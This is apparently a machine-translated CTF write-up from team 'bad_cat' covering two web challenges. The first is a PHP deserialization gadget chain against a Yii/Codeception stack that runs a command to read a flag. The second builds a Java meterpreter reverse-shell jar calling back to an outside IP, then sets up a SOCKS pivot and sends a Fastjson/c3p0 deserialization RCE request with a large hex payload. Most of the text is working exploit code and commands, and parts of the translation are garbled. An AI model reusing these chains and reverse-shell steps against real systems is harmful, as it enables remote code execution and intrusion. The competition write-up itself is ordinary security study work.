Author: Y1fan
A, Team information
Clan name: bad_cat
Team rank: 6
Second, Problem solving is
Three, The problem solving process
web
1, ezyii
Search yII 1day online
Xz.aliyun.com/t/9948#toc-…
The idea is similar to the fourth chain
exp:
namespace Codeception\Extension{
use Faker\DefaultGenerator;
use GuzzleHttp\Psr7\AppendStream;
class RunProcess{
protected $output;
private $processes = [];
public function __construct(){
$this->processes[]=new DefaultGenerator(new AppendStream());
$this->output=new DefaultGenerator('jiang'); }}echo base64_encode(serialize(new RunProcess()));
}
namespace Faker{
class DefaultGenerator
{
protected $default;
public function __construct($default = null)
{
$this->default = $default; }}}namespace GuzzleHttp\Psr7{
use Faker\DefaultGenerator;
final class AppendStream{
private $streams = [];
private $seekable = true;
public function __construct(){
$this->streams[]=newCachingStream(); }}final class CachingStream{
private $remoteStream;
public function __construct(){
$this->remoteStream=new DefaultGenerator(false);
$this->stream=newPumpStream(); }}final class PumpStream{
private $source;
private $size= -10;
private $buffer;
public function __construct(){
$this->buffer=new DefaultGenerator('j');
include("closure/autoload.php");
$a = function(){system('cat /flag.txt'); };$a = \Opis\Closure\serialize($a);
$b = unserialize($a);
$this->source=$b; }}}Copy the codeAnd then post will do
flag{19fefeeb-989a-4017-8001-7af62b9e511b}
2. Layer by layer
Direct jar transfer can bounce shell into the Intranet entrance
Reference blog.csdn.net/cainiao1744…
Msfvenom -p Java /meterpreter/ reverse_TCP LHOST=82.157.25.143 LPORT=11112 -f jar > rce111.jar
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
The set lhost 82.157.25.143
set lport 11112
run -j
Listen before upload, will not report 500 error
Then go to Submit
sessions
Sessions ID run bash -i 2>&1, upload an EW Intranet penetration (github.com/idlefire/ew…
Upload shell execution of MSF
./ ew-s rsSOCKS -d 82.157.25.143-e 18888
Scan segment C to see 10.10.1.11:8080
Post landing
Grab a packet grab session
Cookie: JSESSIONID=DF20EA8AA43E4B62E2CEED904810B112
Copy the codeDecompress the source code to see the POM.xml dependency
The bug is in Fastjson,
Post admin/123456 to log in to /doLogin
Reference github.com/safe6Sec/Fa again… Constructs the POST of the RCE
It has to be greater than 2w
POST /admin/test HTTP / 1.1
Host: 10.10.1.11:8080
Content-Type: application/json
cmd: cat /flag
Content-Length: 31124
Cookie: JSESSIONID=DF20EA8AA43E4B62E2CEED904810B112
{"e": {"@type":"java.lang.Class"."val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f": {"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"."userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000103F400000000000027372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870707400136765744F757470757450726F7065727469657370737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017371007E000B3F4000000000000C770800000010000000017372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00084C00055F6E616D6571007E00074C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000DCFCAFEBABE0000003400CD0A0014005F090033006009003300610700620A0004005F09003300630A006400650A003300660A000400670A000400680A0033006907006A0A0014006B0A0012006C08006D0B000C006E08006F0700700A001200710700720A007300740700750700760700770800780A0079007A0A0018007B08007C0A0018007D08007E08007F0800800B001600810700820A008300840A008300850A008600870A002200880800890A0022008A0A0022008B0A008C008D0A008C008E0A0012008F0A009000910A009000920A001200930A003300940700950A00120096070097010001680100134C6A6176612F7574696C2F486173685365743B0100095369676E61747572650100274C6A6176612F7574696C2F486173685365743C4C6A6176612F6C616E672F4F626A6563743B3E3B010001720100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B010001700100284C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100204C79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F313B01000169010015284C6A6176612F6C616E672F4F626A6563743B295A0100036F626A0100124C6A6176612F6C616E672F4F626A6563743B01000D537461636B4D61705461626C65010016284C6A6176612F6C616E672F4F626A6563743B492956010001650100154C6A6176612F6C616E672F457863657074696F6E3B010008636F6D6D616E64730100135B4C6A6176612F6C616E672F537472696E673B0100016F01000564657074680100014907007607004C070072010001460100017101000D6465636C617265644669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000573746172740100016E0100114C6A6176612F6C616E672F436C6173733B07007007009807009901000A536F7572636546696C65010010436F6D6D6F6E4563686F312E6A6176610C003C003D0C003800390C003A003B0100116A6176612F7574696C2F486173685365740C0034003507009A0C009B009C0C005300480C009D00440C009E00440C004300440100256A617661782F736572766C65742F687474702F48747470536572766C6574526571756573740C009F00A00C00A100A2010003636D640C00A300A401000B676574526573706F6E736501000F6A6176612F6C616E672F436C6173730C00A500A60100106A6176612F6C616E672F4F626A6563740700A70C00A800A90100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73650100136A6176612F6C616E672F457863657074696F6E0100106A6176612F6C616E672F537472696E670100076F732E6E616D650700AA0C00AB00A40C00AC00AD01000357494E0C009D00AE0100022F630100072F62696E2F73680100022D630C00AF00B00100116A6176612F7574696C2F5363616E6E65720700B10C00B200B30C00B400B50700B60C00B700B80C003C00B90100025C410C00BA00BB0C00BC00AD0700BD0C00BE00BF0C00C0003D0C00C100C20700990C00C300C40C00C500C60C00C700C80C003A00480100135B4C6A6176612F6C616E672F4F626A6563743B0C00C900A001001E79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F3101001A5B4C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C640100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010008636F6E7461696E73010003616464010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B010010697341737369676E61626C6546726F6D010014284C6A6176612F6C616E672F436C6173733B295A010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100186A6176612F6C616E672F7265666C6563742F4D6574686F64010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01000B67657450726F706572747901000B746F55707065724361736501001428294C6A6176612F6C616E672F537472696E673B01001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000967657457726974657201001728294C6A6176612F696F2F5072696E745772697465723B0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B295601000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0100046E6578740100136A6176612F696F2F5072696E745772697465720100077072696E746C6E010015284C6A6176612F6C616E672F537472696E673B2956010005666C7573680100116765744465636C617265644669656C647301001C28295B4C6A6176612F6C616E672F7265666C6563742F4669656C643B01000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100076973417272617901000328295A01000D6765745375706572636C617373010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700CA0A00CB005F0021003300CB000000030008003400350001003600000002003700080038003900000008003A003B000000040001003C003D0001003E0000005C000200010000001E2AB700CC01B3000201B30003BB000459B70005B30006B8000703B80008B100000002003F0000001A0006000000140004001500080016000C001700160018001D001900400000000C00010000001E004100420000000A004300440001003E0000005A000200010000001A2AC6000DB200062AB6000999000504ACB200062AB6000A5703AC00000003003F0000001200040000001D000E001E001000210018002200400000000C00010000001A00450046000000470000000400020E01000A003A00480001003E000001D300050003000000EF1B1034A3000FB20002C6000AB20003C60004B12AB8000B9A00D7B20002C70051120C2AB6000DB6000E9900452AC0000CB30002B20002120FB900100200C7000A01B30002A7002AB20002B6000D121103BD0012B60013B2000203BD0014B60015C00016B30003A700084D01B30002B20002C60076B20003C6007006BD00184D1219B8001AB6001B121CB6001D9900102C03120F532C04121E53A7000D2C03121F532C041220532C05B20002120FB90010020053B20003B900210100BB002259B800232CB60024B60025B700261227B60028B60029B6002AB20003B900210100B6002BA700044DB12A1B0460B80008B100020047006600690017007A00E200E500170003003F0000006A001A000000250012002600130028001A0029002C002A0033002B0040002C0047002F0066003300690031006A0032006E0037007A003A007F003B008F003C0094003D009C003F00A1004000A6004200B3004400D7004500E2004700E5004600E6004800E7004B00EE004D00400000002A0004006A00040049004A0002007F0063004B004C0002000000EF004D00460000000000EF004E004F0001004700000022000B1200336107005004FC002D07005109FF003E0002070052010001070050000006000A005300480001003E000001580002000C000000842AB6000D4D2CB6002C4E2DBE360403360515051504A200652D1505323A06190604B6002D013A0719062AB6002E3A071907B6000DB6002F9A000C19071BB80030A7002F1907C00031C000313A081908BE360903360A150A1509A200161908150A323A0B190B1BB80030840A01A7FFE9A700053A08840501A7FF9A2CB60032594DC7FF85B100010027006F007200170003003F0000004200100000005000050052001E00530024005400270056002F0058003A00590043005B0063005C0069005B006F00620072006100740052007A0065007B00660083006800400000003E00060063000600540046000B0027004D004D00460007001E00560055005600060000008400570046000000000084004E004F00010005007F00580059000200470000002E0008FC000507005AFE000B07005B0101FD003107005C070052FE00110700310101F8001942070050F90001F800050001005D00000002005E707400016170770100787400017878737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000000787871007E000D78;"},
"a":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa